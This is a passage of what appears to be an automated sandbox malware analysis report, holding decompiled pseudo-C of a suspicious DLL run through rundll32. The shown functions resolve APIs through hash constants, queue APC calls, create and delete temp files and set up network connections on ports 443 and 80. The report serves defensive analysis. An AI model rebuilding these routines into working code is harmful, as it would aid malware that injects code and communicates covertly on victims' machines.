                  				if (_t146 == _t217) goto 0x80005144;
                  				r9d = 0;
                  				r8d = 0;
                  				 *_t146();
                  				goto 0x80005147;
                  				_t147 = _t217;
                  				 *(_t189 + 0x28) = _t147;
                  				if (_t147 != _t217) goto 0x8000515b;
                  				GetLastError();
                  				goto 0x80005408;
                  				r8d = 0x1102;
                  				HeapAlloc(??, ??, ??);
                  				_t192 =  *0x8000d4a0;
                  				if (_t192 == _t217) goto 0x80005226;
                  				 *_t192 = r12w; // executed
                  				_t55 = RegOpenKeyW(??, ??, ??); // executed
                  				if (_t55 != r12d) goto 0x80005216;
                  				goto 0x800051cf;
                  				r12d = r12d + 1;
                  				if (E00000001180009110(0x180000000, _t154, _t192, _t202 + 0x20, _t192, _t202 + 0x278, _t214) != 0) goto 0x800051ee;
                  				r9d = 0x104; // executed
                  				_t57 = RegEnumKeyW(??, ??, ??, ??); // executed
                  				if (_t57 == 0) goto 0x800051b6;
                  				r12d = 0;
                  				if (_t57 != 0x103) goto 0x80005203;
                  				 *0x8000d480 = _t192;
                  				RegCloseKey(??); // executed
                  				if (r12d == r12d) goto 0x80005234;
                  				HeapFree(??, ??, ??);
                  				goto 0x8000522b;
                  				if (8 != r12d) goto 0x8000540f;
                  				_t193 =  *0x8000d490;
                  				r8d = 8;
                  				memcpy(??, ??, ??);
                  				 *((intOrPtr*)(_t202 + 0x286)) = r12w;
                  				if (E00000001180005CA4(8, 0, _t154, _t189, _t202 + 0x280, _t189,  *0x8000d490,  *0x8000d490 + 0x180011198) == r12d) goto 0x8000529c;
                  				if (E00000001180005CA4(_t61, 0, _t154, _t189, _t202 + 0x280, _t189,  *0x8000d490,  *0x8000d490 + 0x1800111f0) != r12d) goto 0x8000540f;
                  				_t28 = _t189 + 8; // 0x8
                  				_t186 = _t28;
                  				if (E00000001180006DCC(_t154, _t189, _t28, _t189, _t193) != r12d) goto 0x800052e2;
                  				E00000001180003C24(_t154, _t189, _t28, _t189, _t193,  *0x8000d4a0);
                  				 *((long long*)(_t189 + 0x30)) = 0x180000000;
                  				if (0x180000000 == _t217) goto 0x800052e2;
                  				_t30 = _t189 + 8; // 0x8
                  				_t65 = E00000001180003C24(_t154, _t30, _t28, _t189, _t193,  *0x8000d4a0);
                  				 *((long long*)(_t189 + 0x38)) = 0x180000000;
                  				_t90 =  !=  ? r12d : 8;
                  				_t132 = ( !=  ? r12d : 8) - r12d;
                  				if (( !=  ? r12d : 8) != r12d) goto 0x8000540f;
                  				if (E00000001180008708(_t65, _t114, _t154, _t189, _t186) != r12d) goto 0x80005302;
                  				goto 0x8000540f;
                  				_t211 =  *0x8000d490 + 0x18000f000;
                  				r9d = _t211[1] & 0x0000ffff;
                  				r11d =  *_t211 & 0x0000ffff;
                  				_t215 = __r9 + 8;
                  				if (_t216 - _t215 <= 0) goto 0x80005339;
                  				if ((r14d ^ 0xe49a1e6d) == r12d) goto 0x8000533c;
                  				E00000001180004ED8(r14d ^ 0xe49a1e6d, __r9 +  &(_t211[4]));
                  				goto 0x8000533c;
                  				if (_t217 != _t217) goto 0x8000534b;
                  				goto 0x8000540f;
                  				r14d = r14d ^ 0xecb028fc;
                  				if (_t216 - _t215 <= 0) goto 0x8000536e;
                  				if (r14d == r12d) goto 0x80005371;
                  				E00000001180004ED8(r14d, __r9 +  &(_t211[4]));
                  				goto 0x80005371;
                  				_t153 = _t217;
                  				if (_t153 == _t217) goto 0x80005341;
                  				 *(_t189 + 0x40) = _t211;
                  				 *0x8000d488 = _t189;
                  				GetModuleHandleA(??);
                  				if (_t153 ==  *((intOrPtr*)(_t202 + 0x270))) goto 0x800053fb;
                  				E0000000118000459C(0xaade337c, _t153,  *((intOrPtr*)( *0x8000d4a0 + 0x18)));
                  				if (_t153 == _t217) goto 0x800053be;
                  				r8d = GetCurrentThreadId();
                  				 *_t153();
                  				goto 0x800053c1;
                  				if (_t217 == _t217) goto 0x80005150;
                  				E0000000118000459C(0x1c8cff93, _t153,  *((intOrPtr*)(_t199 + 0x18)));
                  				if (_t153 == _t217) goto 0x800053ee;
                  				QueueUserAPC(??, ??, ??); // executed
                  				goto 0x800053f1;
                  				if (r12d != r12d) goto 0x8000541e;
                  				goto 0x80005150;
                  				asm("lock add dword [ebp+0x38], 0x1");
                  				if (E00000001180002B60(_t115, _t189, __r9, _t215, _t216) == r12d) goto 0x8000541e;
                  				E00000001180005578(_t154, _t189, _t217);
                  				goto 0x8000541e;
                  				return 8;
                  			}





























                  0x18000508c
                  0x18000508c
                  0x18000508c
                  0x18000508c
                  0x180005091
                  0x1800050a1
                  0x1800050a8
                  0x1800050b6
                  0x1800050cb
                  0x1800050d1
                  0x1800050d4
                  0x1800050da
                  0x1800050e8
                  0x1800050f1
                  0x1800050f7
                  0x1800050f7
                  0x1800050fe
                  0x180005101
                  0x180005112
                  0x18000511b
                  0x180005129
                  0x180005131
                  0x180005138
                  0x18000513b
                  0x180005140
                  0x180005142
                  0x180005144
                  0x180005147
                  0x18000514e
                  0x180005150
                  0x180005156
                  0x180005164
                  0x180005171
                  0x180005177
                  0x180005184
                  0x1800051a1
                  0x1800051a5
                  0x1800051b0
                  0x1800051b4
                  0x1800051be
                  0x1800051ca
                  0x1800051dc
                  0x1800051e2
                  0x1800051ec
                  0x1800051ee
                  0x1800051f7
                  0x1800051f9
                  0x18000520b
                  0x180005214
                  0x18000521e
                  0x180005224
                  0x18000522e
                  0x180005234
                  0x180005248
                  0x18000524e
                  0x18000526d
                  0x180005280
                  0x18000529f
                  0x1800052a5
                  0x1800052a5
                  0x1800052b6
                  0x1800052c0
                  0x1800052c5
                  0x1800052cc
                  0x1800052ce
                  0x1800052d2
                  0x1800052da
                  0x1800052de
                  0x1800052e2
                  0x1800052e5
                  0x1800052f6
                  0x1800052fd
                  0x180005302
                  0x18000530d
                  0x180005312
                  0x18000531c
                  0x180005323
                  0x18000532d
                  0x180005332
                  0x180005337
                  0x18000533f
                  0x180005346
                  0x18000534b
                  0x180005355
                  0x18000535f
                  0x180005367
                  0x18000536c
                  0x18000536e
                  0x180005374
                  0x180005378
                  0x18000537c
                  0x180005383
                  0x180005391
                  0x18000539c
                  0x1800053a7
                  0x1800053b4
                  0x1800053b7
                  0x1800053bc
                  0x1800053c4
                  0x1800053d3
                  0x1800053db
                  0x1800053ea
                  0x1800053ec
                  0x1800053f4
                  0x1800053f6
                  0x1800053fb
                  0x18000540d
                  0x180005412
                  0x180005417
                  0x18000543a

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: HandleModule$Heap$AllocErrorLast$CloseCriticalCurrentEnumFreeInitializeOpenQueueSectionThreadUsermemcpymemset
                  • String ID:
                  • API String ID: 909755087-0
                  • Opcode ID: 23df82f8670f2ca5d57fcd725f6ce51a55fb78b39f2e81572481ed79961b9dbc
                  • Instruction ID: 9261d350846713a6d61e62943f4705d1cd3b2ba236d4958cf944a875f2eb3085
                  • Opcode Fuzzy Hash: 23df82f8670f2ca5d57fcd725f6ce51a55fb78b39f2e81572481ed79961b9dbc
                  • Instruction Fuzzy Hash: 1AA15C32204B4D92EAE6DB22E4953EE7391B78C7C5F50C421EA8A47795DE78CB9DC301
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 125 180001844-180001874 126 18000187a-18000187d 125->126 127 180001a6f-180001a85 125->127 126->127 128 180001883-180001893 call 180007b04 126->128 131 180001899-1800018b3 GetTempPathW 128->131 132 180001a6a 128->132 133 180001a55 131->133 134 1800018b9-1800018cf HeapAlloc 131->134 132->127 135 180001a5a-180001a68 HeapFree 133->135 134->133 136 1800018d5-1800018e3 GetTempPathW 134->136 135->127 137 1800018e5-180001914 GetSystemTimeAsFileTime GetCurrentThreadId GetTempFileNameW 136->137 138 180001916-180001924 HeapFree 136->138 137->138 139 180001927-18000192a 137->139 138->139 139->133 140 180001930-180001935 139->140 141 180001938-18000194f StrChrW 140->141 142 180001951-180001962 141->142 143 180001964-180001972 lstrlenW 141->143 144 180001976-180001979 142->144 143->144 145 1800019a7-1800019ab 144->145 146 18000197b-180001986 144->146 149 1800019b9-1800019c4 145->149 150 1800019ad-1800019b7 145->150 147 180001988-18000198c 146->147 148 18000198e-180001997 146->148 147->148 151 180001999-18000199c 147->151 148->146 148->151 152 1800019c6-1800019d7 call 180009b7c 149->152 153 1800019ef-1800019f2 149->153 150->151 151->145 156 18000199e-1800019a5 151->156 159 1800019dc-1800019e0 152->159 154 1800019f4-180001a0d call 180003698 153->154 155 180001a3c-180001a53 DeleteFileW HeapFree 153->155 154->155 163 180001a0f-180001a36 call 180005bdc HeapFree 154->163 155->135 156->145 156->150 159->155 161 1800019e2-1800019e8 159->161 161->154 162 1800019ea 161->162 162->141 163->155
                  C-Code - Quality: 15%
                  			E00000001180001844(long long __rbx, void* __rcx, intOrPtr* __rdx, long long _a8, int _a16, char _a24, signed int _a32) {
                  				signed long long _v72;
                  				void* __rdi;
                  				void* __rsi;
                  				void* __rbp;
                  				long _t27;
                  				int _t32;
                  				int _t34;
                  				void* _t36;
                  				int _t53;
                  				int _t61;
                  				intOrPtr _t68;
                  				intOrPtr _t69;
                  				intOrPtr* _t92;
                  				signed long long _t93;
                  				intOrPtr* _t106;
                  				void* _t118;
                  				void* _t121;
                  				intOrPtr* _t122;
                  				intOrPtr* _t123;
                  				void* _t125;
                  				signed long long _t132;
                  				void* _t140;
                  				void* _t145;
                  
                  				_t94 = __rbx;
                  				_a8 = __rbx;
                  				_t92 =  *0x8000d4a0;
                  				r12d = 0;
                  				_t145 = __rcx;
                  				if (__rdx == _t140) goto 0x80001a6f;
                  				if ( *__rdx == r12b) goto 0x80001a6f;
                  				E00000001180007B04(__rbx, __rdx, _t118, _t121, _t125, __rdx);
                  				if (_t92 == _t140) goto 0x80001a6a;
                  				_t93 =  *0x8000d4a0;
                  				_t27 = GetTempPathW(??, ??);
                  				if (_t27 == r12d) goto 0x80001a55;
                  				HeapAlloc(??, ??, ??);
                  				if (_t93 == _t140) goto 0x80001a55;
                  				if (GetTempPathW(??, ??) == r12d) goto 0x80001916;
                  				GetSystemTimeAsFileTime(??);
                  				r8d = GetCurrentThreadId() ^ _a32; // executed
                  				_t32 = GetTempFileNameW(??, ??, ??, ??); // executed
                  				if (_t32 != r12d) goto 0x80001927;
                  				_t132 = _t93;
                  				HeapFree(??, ??, ??);
                  				if (_t140 == _t140) goto 0x80001a55;
                  				_t122 = _t92;
                  				__imp__StrChrW();
                  				r8d = 0;
                  				if (_t93 == _t132) goto 0x80001964;
                  				_a16 = _t27;
                  				goto 0x80001976;
                  				_t106 = _t122;
                  				_t34 = lstrlenW(??);
                  				r8d = 0;
                  				_a16 = _t34;
                  				if (_t34 == r8d) goto 0x800019a7;
                  				_t11 = _t106 - 1; // -1
                  				_t61 = _t11;
                  				_t68 =  *((intOrPtr*)(_t122 + _t93 * 2));
                  				if (_t68 == 0x20) goto 0x8000198e;
                  				if (_t68 != 9) goto 0x80001999;
                  				_t53 = _t61;
                  				_a16 = _t61;
                  				if (_t61 != r8d) goto 0x8000197b;
                  				if (_t53 == r8d) goto 0x800019a7;
                  				_t69 =  *_t122;
                  				if (_t69 == 0x20) goto 0x800019ad;
                  				if (_t69 != 9) goto 0x800019b9;
                  				_t123 = _t122 + 2;
                  				_a16 = _t53 - 1;
                  				goto 0x80001999;
                  				 *((intOrPtr*)(_t123 + _t93 * 2)) = r8w;
                  				if ( *_t123 == r8w) goto 0x800019ef;
                  				_v72 = _t132;
                  				r9d = 0;
                  				_t36 = E00000001180009B7C(_t94, _t145, _t123, _t140, _t123,  *((intOrPtr*)(_t93 + 8)), _t140);
                  				if (_t36 != 0) goto 0x80001a3c;
                  				if (_t93 + 2 == 0) goto 0x800019f4;
                  				goto 0x80001938;
                  				if (_t36 != r8d) goto 0x80001a3c;
                  				if (E00000001180003698(_t36 - r8d, _t94, _t140,  &_a24,  *((intOrPtr*)(_t93 + 8)),  &_a16, _t93) != 0) goto 0x80001a3c;
                  				r9d = _a16;
                  				E00000001180005BDC(_t94, _t145, _t93 + 2,  *((intOrPtr*)(_t93 + 8)), _a24);
                  				HeapFree(??, ??, ??);
                  				DeleteFileW(??); // executed
                  				HeapFree(??, ??, ??);
                  				goto 0x80001a5a;
                  				HeapFree(??, ??, ??);
                  				goto 0x80001a6f;
                  				return 8;
                  			}


























                  0x180001844
                  0x180001844
                  0x180001858
                  0x18000185f
                  0x180001869
                  0x180001874
                  0x18000187d
                  0x180001888
                  0x180001893
                  0x180001899
                  0x1800018a8
                  0x1800018b3
                  0x1800018c3
                  0x1800018cf
                  0x1800018e3
                  0x1800018ed
                  0x180001908
                  0x18000190b
                  0x180001914
                  0x180001916
                  0x18000191e
                  0x18000192a
                  0x180001935
                  0x180001940
                  0x180001946
                  0x18000194f
                  0x18000195e
                  0x180001962
                  0x180001964
                  0x180001967
                  0x18000196d
                  0x180001972
                  0x180001979
                  0x18000197b
                  0x18000197b
                  0x18000197e
                  0x180001986
                  0x18000198c
                  0x18000198e
                  0x180001990
                  0x180001997
                  0x18000199c
                  0x18000199e
                  0x1800019a5
                  0x1800019ab
                  0x1800019ad
                  0x1800019b3
                  0x1800019b7
                  0x1800019bb
                  0x1800019c4
                  0x1800019c6
                  0x1800019cb
                  0x1800019d7
                  0x1800019e0
                  0x1800019e8
                  0x1800019ea
                  0x1800019f2
                  0x180001a0d
                  0x180001a0f
                  0x180001a22
                  0x180001a36
                  0x180001a3f
                  0x180001a4d
                  0x180001a53
                  0x180001a62
                  0x180001a68
                  0x180001a85

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heap$Free$FileTemp$AllocPathTimelstrlen$CurrentDeleteNameSystemThreadmemset
                  • String ID:
                  • API String ID: 2968359827-0
                  • Opcode ID: de161d81a4c838c80d990d95f80ea2948214c8e39259f8f0705995e773597a9e
                  • Instruction ID: f42bf4f4e696ed8dde712627642a23392779c5e7d82fb71db4855592268e1331
                  • Opcode Fuzzy Hash: de161d81a4c838c80d990d95f80ea2948214c8e39259f8f0705995e773597a9e
                  • Instruction Fuzzy Hash: 1C51C931704548CAF7E6DB26A8543EA7691B78DBC1F54C015FE4687BA4EE3C8A4DC701
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 177 180004a14-180004a57 call 18000459c 180 180004a75 177->180 181 180004a59-180004a69 177->181 182 180004a77-180004a79 180->182 183 180004a73 181->183 184 180004a7f-180004a99 call 180006d04 182->184 185 180004c20-180004c26 GetLastError 182->185 183->182 188 180004a9e-180004aa2 184->188 186 180004c28-180004c4a 185->186 189 180004c02-180004c13 call 18000459c 188->189 190 180004aa8-180004acd memset call 18000459c 188->190 189->186 197 180004c15-180004c1e 189->197 195 180004ae3 190->195 196 180004acf-180004ae1 190->196 198 180004ae5-180004ae7 195->198 196->198 197->186 200 180004af9-180004afb 198->200 201 180004ae9-180004af3 GetLastError 198->201 203 180004afd-180004b2c memcpy 200->203 201->189 201->200 204 180004b2e-180004b3b call 18000459c 203->204 205 180004b70-180004b7d call 18000459c 203->205 210 180004baa 204->210 211 180004b3d-180004b6e 204->211 205->210 212 180004b7f-180004ba8 205->212 213 180004bac-180004bae 210->213 211->213 212->213 215 180004bd6-180004bdc GetLastError 213->215 216 180004bb0-180004bcf memcpy 213->216 219 180004bde-180004bf9 call 18000459c 215->219 218 180004bd1 216->218 216->219 218->203 219->189 222 180004bfb 219->222 222->189
                  C-Code - Quality: 24%
                  			E00000001180004A14(void* __ebx, void* __ecx, long long* __rax, long long __rbx, void* __rdx, long long __rsi, long long __rbp, void* __r9, long long _a8, long long _a16, long long _a24, long long* _a40, void* _a48, intOrPtr _a56) {
                  				void* _v40;
                  				char _v80;
                  				intOrPtr _v88;
                  				char _v96;
                  				char _v104;
                  				intOrPtr _v120;
                  				long long _v128;
                  				long long _v136;
                  				char _t57;
                  				intOrPtr _t95;
                  				void* _t96;
                  				long long* _t114;
                  				long long* _t115;
                  
                  				_t114 = __rax;
                  				_a8 = __rbx;
                  				_a16 = __rbp;
                  				_a24 = __rsi;
                  				_t141 =  *0x8000d4a0;
                  				r14d = __ecx;
                  				_t95 = r8d;
                  				E0000000118000459C(0x4e1c2e77, __rax,  *((intOrPtr*)( *0x8000d4a0 + 0x20)));
                  				if (_t114 == 0) goto 0x80004a75;
                  				r9d = 0x18;
                  				r8d = 0;
                  				_v136 = 0xf0000040;
                  				 *_t114(); // executed
                  				goto 0x80004a77;
                  				if (0 == 0) goto 0x80004c20;
                  				r8d = _a56;
                  				_t10 =  &_v96; // -190
                  				if (E00000001180006D04(__rbx, _v88, __rsi, _t10) != 0) goto 0x80004c02;
                  				_t11 = _t114 + 0x10; // 0x10
                  				r15d = _t11;
                  				memset(??, ??, ??);
                  				E0000000118000459C(0xd74cfe41, _t114,  *((intOrPtr*)( *0x8000d4a0 + 0x20)));
                  				if (_t114 == 0) goto 0x80004ae3;
                  				r9d = 0;
                  				 *_t114();
                  				goto 0x80004ae5;
                  				if (0 != 0) goto 0x80004af9;
                  				if (GetLastError() != 0) goto 0x80004c02;
                  				_t57 =  >  ? r15d : _t95;
                  				r8d = _t57;
                  				_v104 = _t57;
                  				memcpy(??, ??, ??);
                  				_t96 = _t95 - _v104;
                  				if (r14d == 0) goto 0x80004b70;
                  				E0000000118000459C(0x4217c141, _t114,  *((intOrPtr*)( *0x8000d4a0 + 0x20)));
                  				if (_t114 == 0) goto 0x80004baa;
                  				r8d = 0;
                  				_t23 =  &_v104; // -198
                  				_v120 = 0x20;
                  				_v128 = _t23;
                  				_t26 =  &_v80; // -174
                  				r8b = _t96 == 0;
                  				_v136 = _t26;
                  				r9d = 0;
                  				 *_t114();
                  				goto 0x80004bac;
                  				E0000000118000459C(0x8ea73a36, _t114, _v96);
                  				if (_t114 == 0) goto 0x80004baa;
                  				r8d = 0;
                  				_t29 =  &_v104; // -198
                  				_v128 = _t29;
                  				r8b = _t96 == 0;
                  				_t31 =  &_v80; // -174
                  				_v136 = _t31;
                  				r9d = 0;
                  				 *_t114();
                  				goto 0x80004bac;
                  				if (0 == 0) goto 0x80004bd6;
                  				r8d = _v104;
                  				memcpy(??, ??, ??);
                  				if (_t96 == 0) goto 0x80004bde;
                  				goto 0x80004afd;
                  				GetLastError();
                  				_t115 = _a40;
                  				 *_t115 = 0 + _v104;
                  				E0000000118000459C(0xff709000, _t115,  *((intOrPtr*)( *0x8000d4a0 + 0x20)));
                  				if (_t115 == 0) goto 0x80004c02;
                  				 *_t115();
                  				E0000000118000459C(0xbaca8f4d, _t115,  *((intOrPtr*)(_t141 + 0x20)));
                  				if (_t115 == 0) goto 0x80004c28;
                  				 *_t115();
                  				goto 0x80004c28;
                  				return GetLastError();
                  			}
















                  0x180004a14
                  0x180004a14
                  0x180004a19
                  0x180004a1e
                  0x180004a33
                  0x180004a3a
                  0x180004a4c
                  0x180004a4f
                  0x180004a57
                  0x180004a5e
                  0x180004a64
                  0x180004a69
                  0x180004a71
                  0x180004a73
                  0x180004a79
                  0x180004a7f
                  0x180004a94
                  0x180004aa2
                  0x180004aa8
                  0x180004aa8
                  0x180004ab7
                  0x180004ac5
                  0x180004acd
                  0x180004adc
                  0x180004adf
                  0x180004ae1
                  0x180004ae7
                  0x180004af3
                  0x180004b07
                  0x180004b0e
                  0x180004b11
                  0x180004b15
                  0x180004b1e
                  0x180004b2c
                  0x180004b33
                  0x180004b3b
                  0x180004b3d
                  0x180004b40
                  0x180004b45
                  0x180004b4d
                  0x180004b52
                  0x180004b59
                  0x180004b5d
                  0x180004b67
                  0x180004b6c
                  0x180004b6e
                  0x180004b75
                  0x180004b7d
                  0x180004b7f
                  0x180004b82
                  0x180004b89
                  0x180004b8e
                  0x180004b92
                  0x180004b97
                  0x180004ba1
                  0x180004ba6
                  0x180004ba8
                  0x180004bae
                  0x180004bb0
                  0x180004bbd
                  0x180004bcf
                  0x180004bd1
                  0x180004bd6
                  0x180004bde
                  0x180004beb
                  0x180004bf1
                  0x180004bf9
                  0x180004c00
                  0x180004c0b
                  0x180004c13
                  0x180004c1c
                  0x180004c1e
                  0x180004c4a

                  APIs
                    • Part of subcall function 000000018000459C: SetLastError.KERNEL32 ref: 00000001800045D8
                  • memset.NTDLL(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004AB7
                  • GetLastError.KERNEL32(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004AE9
                  • memcpy.NTDLL(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004B15
                  • memcpy.NTDLL(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004BBD
                  • GetLastError.KERNEL32(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004BD6
                  • GetLastError.KERNEL32(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004C20
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: ErrorLast$memcpy$memset
                  • String ID: $@
                  • API String ID: 1408984137-1077428164
                  • Opcode ID: be6200e352fab92637c5afd41c3fe7e33f93d86144c39c949b6fe9b9e880e760
                  • Instruction ID: 6549d2ab533297c31cadfe8b85b87dceba819ad31def954566d9370a515f3166
                  • Opcode Fuzzy Hash: be6200e352fab92637c5afd41c3fe7e33f93d86144c39c949b6fe9b9e880e760
                  • Instruction Fuzzy Hash: A851607330574982EBA2DBA5A45079AB7A0FBCC7D0F548411BE8D87B49DF78CA08CB04
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 275 1800027d4-18000281d call 180007b04 278 180002823-18000282b 275->278 279 180002a78-180002a7e GetLastError 275->279 280 18000282d 278->280 281 18000283e 278->281 282 180002a80-180002a99 279->282 283 180002835-18000283c 280->283 284 18000282f-180002833 280->284 285 180002846-180002857 call 18000459c 281->285 283->285 284->281 284->283 288 180002871 285->288 289 180002859-180002869 285->289 290 180002874-18000288a HeapFree 288->290 291 18000286f 289->291 290->279 292 180002890-180002897 290->292 291->290 293 180002899-1800028aa call 18000459c 292->293 294 1800028ce-1800028df call 180007b04 292->294 299 1800028c4 293->299 300 1800028ac-1800028c2 293->300 294->279 301 1800028e5-1800028f7 294->301 302 1800028c6-1800028c8 299->302 300->302 303 180002938 301->303 304 1800028f9-180002912 call 18000459c 301->304 302->279 302->294 305 18000293e-18000294f call 18000459c 303->305 311 180002914-180002920 304->311 312 180002927-180002936 304->312 313 180002951-18000295c 305->313 314 180002963 305->314 311->312 312->305 316 180002961 313->316 315 180002966-18000297c HeapFree 314->315 315->279 317 180002982-180002993 call 180007b04 315->317 316->315 317->279 320 180002999-1800029aa call 18000459c 317->320 323 1800029ac-1800029e4 320->323 324 1800029ed 320->324 326 1800029eb 323->326 325 1800029f0-180002a06 HeapFree 324->325 325->279 327 180002a08-180002a26 call 18000459c 325->327 326->325 330 180002a28-180002a3e 327->330 331 180002a40 327->331 332 180002a42-180002a44 330->332 331->332 332->282 334 180002a46-180002a60 call 18000459c 332->334 334->282 337 180002a62-180002a76 334->337 337->282
                  C-Code - Quality: 26%
                  			E000000011800027D4(long long __rbx, intOrPtr* __rcx, void* __rdx) {
                  				void* __rdi;
                  				void* __rsi;
                  				void* __rbp;
                  				void* _t100;
                  				long long* _t119;
                  				long long* _t120;
                  				long long* _t121;
                  				long long* _t122;
                  				long long* _t123;
                  				void* _t151;
                  				void* _t152;
                  				intOrPtr* _t153;
                  				void* _t155;
                  				void* _t158;
                  				long long* _t161;
                  				void* _t163;
                  				void* _t164;
                  				long _t176;
                  				void* _t178;
                  				void* _t181;
                  				void* _t184;
                  
                  				_t123 = __rbx;
                  				 *((long long*)(_t163 + 0x10)) = __rbx;
                  				 *(_t163 + 0x18) = r8d;
                  				_t164 = _t163 - 0x50;
                  				_t119 =  *0x8000d4a0;
                  				_t156 =  *__rcx;
                  				_t153 = __rcx;
                  				r15d = r9d;
                  				E00000001180007B04(__rbx, __rdx, __rcx,  *__rcx, _t158, __rdx, _t184, _t181);
                  				if (_t119 == _t123) goto 0x80002a78;
                  				_t100 =  *((char*)(_t153 + 0x75)) - 6;
                  				_t5 = _t123 + 4; // 0x4
                  				r12d = _t5;
                  				if (_t100 > 0) goto 0x8000283e;
                  				if (_t100 != 0) goto 0x80002835;
                  				if ( *((char*)(_t153 + 0x74)) - 2 > 0) goto 0x8000283e;
                  				 *((intOrPtr*)(_t164 + 0x90)) = 0;
                  				goto 0x80002846;
                  				 *((intOrPtr*)(_t164 + 0x90)) = r12d;
                  				E0000000118000459C(0x3fe3c8ba, _t119,  *((intOrPtr*)(_t156 + 0x50)));
                  				if (_t119 == _t123) goto 0x80002871;
                  				r9d = 0;
                  				r8d = 0;
                  				 *((intOrPtr*)(_t164 + 0x20)) = 0;
                  				 *_t119(); // executed
                  				goto 0x80002874;
                  				_t120 = _t123;
                  				 *((long long*)(_t153 + 0x28)) = _t120;
                  				HeapFree(_t178, _t176, _t152);
                  				if ( *((intOrPtr*)(_t153 + 0x28)) == _t123) goto 0x80002a78;
                  				if ( *((intOrPtr*)(_t164 + 0xa0)) == 0) goto 0x800028ce;
                  				E0000000118000459C(0xe7f09937, _t120,  *((intOrPtr*)(_t156 + 0x50)));
                  				if (_t120 == _t123) goto 0x800028c4;
                  				_t17 = _t164 + 0xa0; // 0x12
                  				r9d = r12d;
                  				 *_t120();
                  				goto 0x800028c6;
                  				if (0 == 0) goto 0x80002a78;
                  				E00000001180007B04(_t123,  *((intOrPtr*)(_t153 + 8)), _t153, _t156, _t119, _t17, _t155, _t158);
                  				if (_t120 == _t123) goto 0x80002a78;
                  				 *((intOrPtr*)(_t164 + 0x90)) = 0x100;
                  				if ( *((intOrPtr*)(_t164 + 0xb0)) == 0) goto 0x80002938;
                  				 *((intOrPtr*)(_t164 + 0x40)) = 0xaa0;
                  				E0000000118000459C(0xe7f09937, _t120,  *((intOrPtr*)(_t156 + 0x50)));
                  				if (_t120 == _t123) goto 0x80002927;
                  				r9d = r12d;
                  				 *_t120();
                  				asm("bts dword [esp+0x90], 0x17");
                  				r12d = 0x1bb;
                  				goto 0x8000293e;
                  				r12d = 0x50;
                  				E0000000118000459C(0x7dda0345, _t120,  *((intOrPtr*)(_t156 + 0x50)));
                  				if (_t120 == _t123) goto 0x80002963;
                  				r9d = 0;
                  				r8d = r12w & 0xffffffff;
                  				 *_t120(); // executed
                  				goto 0x80002966;
                  				_t121 = _t123;
                  				 *((long long*)(_t153 + 0x30)) = _t121;
                  				HeapFree(??, ??, ??);
                  				if ( *((intOrPtr*)(_t153 + 0x30)) == _t123) goto 0x80002a78;
                  				E00000001180007B04(_t123,  *((intOrPtr*)(_t153 + 0x10)), _t153, _t156, _t120, _t120);
                  				_t161 = _t121;
                  				if (_t121 == _t123) goto 0x80002a78;
                  				E0000000118000459C(0xaa9d9fc1, _t121,  *((intOrPtr*)(_t156 + 0x50)));
                  				if (_t121 == _t123) goto 0x800029ed;
                  				_t151 =  !=  ?  *0x8000d490 + 0x180011260 :  *0x8000d490 + 0x180011278;
                  				r9d = 0;
                  				 *((intOrPtr*)(_t164 + 0x30)) =  *((intOrPtr*)(_t164 + 0x90));
                  				 *((long long*)(_t164 + 0x28)) = _t123;
                  				 *((long long*)(_t164 + 0x20)) = _t123;
                  				 *_t121(); // executed
                  				goto 0x800029f0;
                  				_t122 = _t123;
                  				 *((long long*)(_t153 + 0x38)) = _t122;
                  				HeapFree(??, ??, ??);
                  				if ( *((intOrPtr*)(_t153 + 0x38)) == _t123) goto 0x80002a78;
                  				 *((intOrPtr*)(_t164 + 0x44)) = 4;
                  				E0000000118000459C(0x677ec78c, _t122,  *((intOrPtr*)(_t156 + 0x50)));
                  				_t45 = _t161 + 0x1b; // 0x1f
                  				r12d = _t45;
                  				if (_t122 == _t123) goto 0x80002a40;
                  				 *_t122();
                  				goto 0x80002a42;
                  				if (0 == 0) goto 0x80002a80;
                  				asm("bts dword [esp+0x90], 0x8");
                  				E0000000118000459C(0xe7f09937, _t122,  *((intOrPtr*)(_t156 + 0x50)));
